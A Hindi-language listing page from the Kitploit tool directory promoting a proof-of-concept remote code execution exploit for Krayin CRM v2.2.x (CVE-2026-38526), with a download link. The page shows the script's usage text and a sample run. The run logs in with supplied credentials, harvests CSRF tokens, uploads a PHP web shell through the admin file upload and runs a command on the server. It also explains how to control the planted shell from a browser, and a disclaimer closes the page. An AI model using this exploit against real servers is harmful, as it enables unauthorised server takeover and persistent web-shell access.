Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-38526-KrayinCRM-RCE — CVE-2026-38526 एक्सप्लॉइट | द्वारा infrar3d | Kitploit
उपकरण/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-38526-krayincrm-rce

CVE-2026-38526-KrayinCRM-RCE

CVE-2026-38526 एक्सप्लॉइट | द्वारा infrar3d

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2026-38526 - Krayin CRM RCE

infrar3d द्वारा शोषण किया गया

यह एक रिमोट कोड एक्सीक्यूशन (RCE) प्रूफ-ऑफ-कॉन्सेप्ट है जो विशेष रूप से Krayin CRM v2.2.x के लिए डिज़ाइन किया गया है, जो एक ओपन-सोर्स कस्टमर रिलेशनशिप मैनेजमेंट सिस्टम है। यह स्क्रिप्ट CRM के प्रशासनिक इंटरफ़ेस में फ़ाइल अपलोड कमज़ोरी का दोहन करके लक्ष्य सर्वर पर रिमोट कमांड निष्पादन प्राप्त करने की प्रक्रिया को स्वचालित करती है।

उपयोग:

root@kitploit:~
python3 CVE-2026-38526.py --help
usage: CVE-2026-38526.py [-h] -rh RHOST -u USERNAME -p PASSWORD -c COMMAND

Krayin CRM RCE Exploit

options:
  -h, --help            show this help message and exit
  -rh, --rhost RHOST    Remote host
  -u, --username USERNAME
                        Username or E-mail
  -p, --password PASSWORD
                        Password
  -c, --command COMMAND
                        Command to execute
                                         

उदाहरण:

root@kitploit:~
python3 CVE-2026-38526.py -rh http://krayin.endpoint.site -u '[email protected]' -p 's3cur3-p4ss' -c 'id'

[*] Getting login page...
[+] CSRF Token: 3b438w26pvvr2rhWToWURhAhyGPdeWZm6DRShdUd
[*] Attempting login as: [email protected]...
[+] Redirect: http://krayin.endpoint.site/admin/dashboard
[+] Login successful!
[+] Session established successfully
[+] XSRF Token: eyJpdiI6ImVDY3h5c2dRdk5JS1NXaVdJaDJGdVE9PSIsInZhbH...
[*] Getting fresh CSRF token for upload...
[+] Found _token in modal
[+] Upload CSRF Token: ZQwH7QLajl5wZdNAOSX8Sk0v7z9spW1VYrw4VESW
[*] Uploading shell...
[+] Upload response status: 200
[+] File uploaded successfully!
[+] Location: http://krayin.endpoint.site/storage/tinymce/a9e2d9a51d41723acad27dc2c7ec861d.php
[*] Executing command: id
[+] Command output:
============================================================

uid=33(www-data) gid=33(www-data) groups=33(www-data)

============================================================
                                                                                         

यह स्क्रिप्ट डिफ़ॉल्ट रूप से revshells.com से एक PHP cmd शेल अपलोड करती है।

शोषण के बाद आप इसे अपने ब्राउज़र में खोल सकते हैं और वेब पेज से कमांड भेज सकते हैं।

⚠️ अस्वीकरण ⚠️

यह सॉफ़्टवेयर और प्रूफ-ऑफ-कॉन्सेप्ट कोड केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

  • लेखक किसी भी दुरुपयोग या इस प्रोग्राम के कारण होने वाली क्षति के लिए जिम्मेदार नहीं हैं।
  • बिना स्पष्ट पूर्व अनुमति के किसी भी सिस्टम के विरुद्ध इसका उपयोग न करें।
  • बिना सहमति के लक्ष्यों पर हमला करने के लिए इस उपकरण का उपयोग अवैध है।

आप सभी लागू कानूनों का पालन करने के लिए जिम्मेदार हैं। नैतिक और जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें